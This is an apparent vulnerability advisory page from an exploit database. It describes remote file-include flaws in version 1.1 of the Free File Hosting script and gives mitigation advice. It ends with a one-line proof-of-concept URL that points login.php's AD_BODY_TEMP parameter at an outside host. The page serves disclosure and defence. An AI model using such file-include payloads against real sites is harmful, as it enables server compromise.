Free File Hosting Remote File Include Vulnerabilities

vendor:

Free File Hosting

by:

Unknown

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: Free File Hosting

Affected Version From: 1.1

Affected Version To: 1.1

Patch Exists: No

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

Free File Hosting Remote File Include Vulnerabilities

The Free File Hosting application fails to properly sanitize user-supplied data, leading to multiple remote file-include vulnerabilities. Exploiting these vulnerabilities can result in compromising the application and the underlying system, as well as enabling other types of attacks.

Mitigation:

To mitigate these vulnerabilities, it is recommended to implement proper input validation and sanitization mechanisms in the application's code. Additionally, the application should use a whitelist approach to only allow specific file paths or URLs to be included.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/23118/info
 
Free File Hosting is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
 
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
 
Version 1.1 is vulnerable to these issues.
 
This BID was incorrectly reporting Free File Upload script as the affected package. Free File Upload script is the demo version of the Free File Hosting script.
 
This issue is related to BID 20781 - Free File Hosting Forgot_Pass.PHP Remote File Include Vulnerability. 

http://www.example.com/login.php?AD_BODY_TEMP=http://www.example2.com